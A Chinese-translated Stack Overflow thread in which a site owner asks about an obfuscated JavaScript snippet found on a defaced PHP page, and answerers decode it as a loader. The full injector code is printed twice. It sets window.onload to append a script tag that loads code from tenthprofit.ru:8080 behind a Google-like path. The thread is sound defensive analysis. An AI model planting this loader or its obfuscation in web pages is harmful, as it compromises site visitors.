这个脚本做什么用的?它是恶意的吗?

时间:2010-05-25 10:46:13

标签: javascript security

此脚本被添加到了某客户网站(运行PHP)的一个被篡改的网页中。我不知道这个脚本能做什么,也不确定它是否真的是恶意的。有人能给些建议吗?代码如下......

// Analysis notes: the code is left exactly as posted; only comments were added.
// This is an obfuscated script-injection loader. H() decodes a few strings and
// defines h(); h() is installed as window.onload and appends a <script> element
// to document.body whose src decodes to
//   http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php
// "google.com/abc.go.com/terra.com.br" is only the URL path; the host that is
// contacted is tenthprofit.ru on port 8080.
// Most statements (counters, empty objects/arrays, this.* writes, empty
// try/catch) are not read anywhere in this listing and appear to be filler.
// NOTE(review): the question says this was found in a defaced page, so removing
// the snippet alone does not explain how the page was modified; that write path
// still needs to be found and closed.
var GU = '';
// Assigned inside H(); later installed as the window.onload handler.
var h;
var X = new String();
var mP = "";
// H is created as an implicit global (no var). Calling it decodes the strings
// below and defines h.
H = function () {
    var F = ["hu"];

    // L(str, start, len): thin wrapper around substr, used to cut the padding
    // characters off each string piece.
    function L(Lc, O, d) {
        return Lc.substr(O, d);
    }
    OH = 55345;
    OH -= 37;
    // Alias for document.
    var x = document;
    QM = 6929;
    QM++;
    q = 25298;
    q -= 65;
    // Replacement string used by y(): matched characters are deleted.
    var t = '';
    var vs = {};
    var u = ["hR"];
    // Alias for the RegExp constructor.
    var Oi = RegExp;
    var A = {
        kh: "LQ"
    };
    // Decodes to "/google.com/abc.go.com/terra.com.br.php" (the URL path).
    var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
    yz = {
        Ec: false
    };

    // y(text, junk): builds the regex /[junk]/g and removes every character of
    // text that belongs to that set, leaving the hidden word.
    function y(Lc, O) {
        hI = 24414;
        hI++;
        g = {};
        a = 28529;
        a--;
        // "[" + O + "]" -> character class made from the junk alphabet.
        var d = new String(L("[n0jJ", 0, 1)) + O + String("]");
        var m = new Oi(d, String("g"));
        n = {
            kW: 40818
        };
        ly = {
            HN: false
        };
        return Lc.replace(m, t);
    };
    ZW = 9686;
    ZW -= 202;
    GE = 56525;
    GE -= 235;
    D = ["u_", "QP"];
    var E = null;
    var vd = {
        ka: "J"
    };
    var Jn = new Date();
    Xg = {
        V: 51919
    };
    // 751407 - 743327 = 8080, the port number.
    var l = 751407 - 743327;
    try {} catch (U) {};
    // Property name used later as document["body"].
    var W = new String("body");
    var qi = "qi";
    this.Vf = 38797;
    this.Vf--;
    // Decodes to "script".
    var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ');
    var RlE = 58536;
    var Xx = false;
    this.jo = '';
    vi = 41593;
    vi--;
    // The injector itself; it is only defined here and runs later via onload.
    h = function () {
        try {
            var YU = new String();
            var DY = "";
            // Decodes to "createElement".
            var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6');
            CN = {
                _Y: 63379
            };
            // s = document.createElement("script"), stored in an implicit global.
            s = x[dY](P);
            var fH = "fH";
            pI = 33929;
            pI--;
            Uw = [];
            // Decodes to "src".
            var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK');
            var Wg = [];
            // 8080 + path -> "8080/google.com/abc.go.com/terra.com.br.php"
            // (the number is coerced to a string by the concatenation).
            var Lc = l + v;
            var yW = new String();
            var iO = new String();
            // "defer".
            var Oe = String("defe" + "r");
            var Et = ["qO", "AF"];
            var QX = 13548;
            // s.src = "http://tenthprofit.ru:" + Lc.
            s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
            PA = {};
            // s.defer = 1.
            s[Oe] = [2, 1][1];
            this.Vt = "Vt";
            var ho = 46131;
            try {
                var kn = 'cI'
            } catch (kn) {};
            this.ww = 27193;
            this.ww += 97;
            // document.body.appendChild(s): the browser then fetches and
            // executes whatever the remote URL returns.
            x[W].appendChild(s);
            this.yk = 60072;
            this.yk++;
            var Lp = new Date();
        } catch (PY) {
            // Any error is swallowed; the handler only writes unused properties.
            this.ku = 43483;
            this.ku++;
            this.ra = 47033;
            this.ra--;
            this.ru = "ru";
        };
        var lu = new Array();
        var me = new String();
    };
};
YB = ["LB", "uM"];
var AI = {
    Vm: 4707
};
// Run the decoder so that h is defined.
H();
this.mDs = 57864;
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
// Overwrites any existing onload handler with the injector.
window.onload = h;
var PQ = false;
var mF = {
    Hm: false
};
try {
    var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";

6 个答案:

答案 0 :(得分:7)

如果您没有添加它,那么它肯定会归类为恶意

答案 1 :(得分:5)

是的,这当然是恶意的。它试图看起来像谷歌的一部分:

new String("/goo" + "gle." + L("com/DyBg", 0, 4)

但它实际上在tenthprofit.ru上做了一些事情(重定向/信息收集)

// The string pieces decode to "http://tenthprofit.ru:"; Lc is built in the script as l + v and supplies the port and path.
new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;

最好是保存此代码并将其从页面中删除。

为了使其更具可读性,您可以用 Jsbeautifier 对它进行格式化(只是重新排版,无需执行脚本)。

答案 2 :(得分:3)

此脚本会在HTML文件的body中添加一个新的<script>元素,该元素尝试将“tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php”作为标签的src属性加载。它已被撤下,所以现在应该是无害的。

它会在BODY标签的末尾添加以下这一行:

<!-- Decoded equivalent of the element the obfuscated script builds (the script also sets defer). The host is tenthprofit.ru:8080; everything after it is only a path made to resemble well-known domains. -->
<script src="http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php"></script>

答案 3 :(得分:1)

以下是"beautified script"

// Analysis notes: the code is left exactly as posted; only comments were added.
// This is an obfuscated script-injection loader. H() decodes a few strings and
// defines h(); h() is installed as window.onload and appends a <script> element
// to document.body whose src decodes to
//   http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php
// "google.com/abc.go.com/terra.com.br" is only the URL path; the host that is
// contacted is tenthprofit.ru on port 8080.
// Most statements (counters, empty objects/arrays, this.* writes, empty
// try/catch) are not read anywhere in this listing and appear to be filler.
var GU = '';
// Assigned inside H(); later installed as the window.onload handler.
var h;
var X = new String();
var mP = "";
// H is created as an implicit global (no var). Calling it decodes the strings
// below and defines h.
H = function () {
    var F = ["hu"];

    // L(str, start, len): thin wrapper around substr, used to cut the padding
    // characters off each string piece.
    function L(Lc, O, d) {
        return Lc.substr(O, d);
    }
    OH = 55345;
    OH -= 37;
    // Alias for document.
    var x = document;
    QM = 6929;
    QM++;
    q = 25298;
    q -= 65;
    // Replacement string used by y(): matched characters are deleted.
    var t = '';
    var vs = {};
    var u = ["hR"];
    // Alias for the RegExp constructor.
    var Oi = RegExp;
    var A = {
        kh: "LQ"
    };
    // Decodes to "/google.com/abc.go.com/terra.com.br.php" (the URL path).
    var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
    yz = {
        Ec: false
    };

    // y(text, junk): builds the regex /[junk]/g and removes every character of
    // text that belongs to that set, leaving the hidden word.
    function y(Lc, O) {
        hI = 24414;
        hI++;
        g = {};
        a = 28529;
        a--;
        // "[" + O + "]" -> character class made from the junk alphabet.
        var d = new String(L("[n0jJ", 0, 1)) + O + String("]");
        var m = new Oi(d, String("g"));
        n = {
            kW: 40818
        };
        ly = {
            HN: false
        };
        return Lc.replace(m, t);
    };
    ZW = 9686;
    ZW -= 202;
    GE = 56525;
    GE -= 235;
    D = ["u_", "QP"];
    var E = null;
    var vd = {
        ka: "J"
    };
    var Jn = new Date();
    Xg = {
        V: 51919
    };
    // 751407 - 743327 = 8080, the port number.
    var l = 751407 - 743327;
    try {} catch (U) {};
    // Property name used later as document["body"].
    var W = new String("body");
    var qi = "qi";
    this.Vf = 38797;
    this.Vf--;
    // Decodes to "script".
    var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ');
    var RlE = 58536;
    var Xx = false;
    this.jo = '';
    vi = 41593;
    vi--;
    // The injector itself; it is only defined here and runs later via onload.
    h = function () {
        try {
            var YU = new String();
            var DY = "";
            // Decodes to "createElement".
            var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6');
            CN = {
                _Y: 63379
            };
            // s = document.createElement("script"), stored in an implicit global.
            s = x[dY](P);
            var fH = "fH";
            pI = 33929;
            pI--;
            Uw = [];
            // Decodes to "src".
            var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK');
            var Wg = [];
            // 8080 + path -> "8080/google.com/abc.go.com/terra.com.br.php"
            // (the number is coerced to a string by the concatenation).
            var Lc = l + v;
            var yW = new String();
            var iO = new String();
            // "defer".
            var Oe = String("defe" + "r");
            var Et = ["qO", "AF"];
            var QX = 13548;
            // s.src = "http://tenthprofit.ru:" + Lc.
            s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
            PA = {};
            // s.defer = 1.
            s[Oe] = [2, 1][1];
            this.Vt = "Vt";
            var ho = 46131;
            try {
                var kn = 'cI'
            } catch (kn) {};
            this.ww = 27193;
            this.ww += 97;
            // document.body.appendChild(s): the browser then fetches and
            // executes whatever the remote URL returns.
            x[W].appendChild(s);
            this.yk = 60072;
            this.yk++;
            var Lp = new Date();
        } catch (PY) {
            // Any error is swallowed; the handler only writes unused properties.
            this.ku = 43483;
            this.ku++;
            this.ra = 47033;
            this.ra--;
            this.ru = "ru";
        };
        var lu = new Array();
        var me = new String();
    };
};
YB = ["LB", "uM"];
var AI = {
    Vm: 4707
};
// Run the decoder so that h is defined.
H();
this.mDs = 57864;
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
// Overwrites any existing onload handler with the injector.
window.onload = h;
var PQ = false;
var mF = {
    Hm: false
};
try {
    var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";

我认为这条线特别令人毛骨悚然:

// G decodes to "src" and the string pieces to "http://tenthprofit.ru:"; with Lc appended the value is the full remote script URL.
s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;

它将s[G]设置为tenthprofit.ru上的网址。

答案 4 :(得分:0)

  

如果你想让别人回答你的问题,我想你需要把代码格式化得更好看一些,采用更便于人阅读的形式。

像这样How to scroll the horizontal scrollbar in an iFrame from the parent frame?

修改

此外,您的“恶意”脚本也会破坏SO网站。它肯定是恶意的

答案 5 :(得分:0)

嗯,根据定义,它是恶意的,因为它是作为污损的一部分添加的。它似乎将人们重定向到tenthprofit.ru,但我没有运行它,所以这是基于对(混淆的)代码的粗略检查。